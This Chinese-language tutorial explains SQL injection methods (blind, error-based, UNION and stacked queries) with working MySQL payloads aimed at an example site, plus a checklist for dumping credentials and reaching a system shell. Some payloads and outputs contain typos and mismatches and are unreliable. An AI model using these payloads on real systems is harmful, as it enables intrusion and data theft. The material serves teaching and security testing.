SQL 注入方法 - 盲注、报错注入、UNION查询注入与堆叠注入

盲注

关键点是 根据页面返回内容分析 Payload 中的问题是否为真,然后通过多次测试遍历出想要的数据

布尔盲注

目标地址:http://newspaper.com/items.php?id=2

对应的SQL语句:SELECT title, description, body FROM items WHERE ID = 2

然后攻击者尝试返回 false 的查询:http://newspaper.com/items.php?id=2 and 1=2

对应的SQL语句:SELECT title, description, body FROM items WHERE ID = 2 and 1=2

如果网页应用存在 SQL 注入漏洞,那么其可能不会返回数据。为了确认这一点,攻击者会再次注入一次返回 true 的查询:http://newspaper.com/items.php?id=2 and 1=1

如果前后两次查询返回的网页内容不同,攻击者就能够通过组合 Payload 遍历出想要的数据。

时间盲注

猜测密码的首字符是否为 ‘2’,是的话等待10秒。

对应 MySQL 语句为 1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;

报错注入

完整的语句如 SELECT * FROM xxx WHERE id=1 AND ({Payload}),{Payload} 详细内容见下文

关键点是 构造错误信息,让自己想要的数据被输出到错误信息中

RAND

SELECT COUNT(*), CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x

  • RAND(0) 0为随机函数的种子,该函数产生浮点数v,且v的范围为 0 <= v < 1.0
  • FLOOR(X) 取不大于 X 的最大整数
  • FLOOR(RAND(0)*2) 返回 0 或 1
  • 0x3a 是 “:” 的 Unicode,单纯为了拼接好看
  • CONCAT() 拼接字符串
  • GROUP BY 按拼接字符串分组
  • COUNT(*) 记录的总数,这里会阻止 GROUP BY 直接优化得到 0 和 1 的结果

结合以上内容,当 FLOOR(RAND(0)*2) 出现重复值时,数据库会报错,报错信息类似 Error: Duplicate entry ‘5.1.73-0ubuntu0.10.04.1:1’ for key ‘group_key’

这样我们就可以从报错信息中获取到我们想要的信息,这次是数据库版本。

rand 的结果是随机的,也可以选择以下两种函数来构造错误信息。

ExtractValue

Description: 查询 XML 文档的函数
Payload: ExtractValue(1,CONCAT(0x7e,(SELECT version()),0x7e))
Output: - XPATH syntax error: '~5.5.53~'

UpdateXml

Description: 修改 XML 文档的函数
Payload: UpdateXml(1,concaCONCATt(0x7e,(SELECT user()),0x7e),1)
Output: - XPATH syntax error: '~5.5.53~'

UNION 查询注入

UNION 语句合并多个 SELECT 语句的结果并返回

关键点:UNION 连接的多个 SELECT 语句中,每一列的数据类型应该相同,且选中相同数量的列。对于 Oracle 数据库,还要求 SELECT 必须使用 FORM 指定一个有效的表名。

确定列的数量

  1. 使用 ORDER BY <column_index>

依次使用以下序列中的语句,直到报错,如 The ORDER BY position number 3 is out of range of the number of items in the select list,进而确认列的数量。

1
2
3
1 ORDER BY 1--
1 ORDER BY 2--
1 ORDER BY 3--
  1. 使用 UNION SELECE NULL,...

NULL 可以被转为任意数据类型,所以这里可以用来作为返回值。

依次使用以下序列中的语句,直到报错,如 All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists,进而确认列的数量。

1
2
3
1 UNION SELECT NULL--
1 UNION SELECT NULL,NULL--
1 UNION SELECT NULL,NULL,NULL--

找到字符串类型的列

同样的,可以依次尝试以下序列:

1
2
3
4
1 UNION SELECT 'a',NULL,NULL,NULL--
1 UNION SELECT NULL,'a',NULL,NULL--
1 UNION SELECT NULL,NULL,'a',NULL--
1 UNION SELECT NULL,NULL,NULL,'a'--

如果对应的列与字符串类型不兼容,就会报错,如 Conversion failed when converting the varchar value ‘a’ to data type int ,所以如果不报错,我们就找到了字符串类型的列。

覆盖原有数据

注入点一般在 WHERE 处,使用 1 AND false UNION SELECT ... 将原有输出覆盖。

堆叠注入

堆叠注入指的是被注入方允许同时执行多条语句,那么攻击者就可以利用额外的语句完成任何操作。

敏感数据

成功注入后,接下来的流程一般是:

  • 获取当前用户/数据库
  • 获取用户名和密码
  • 枚举数据库/表/列
  • 尝试获取系统 shell
  • 结合利用其他漏洞

Reference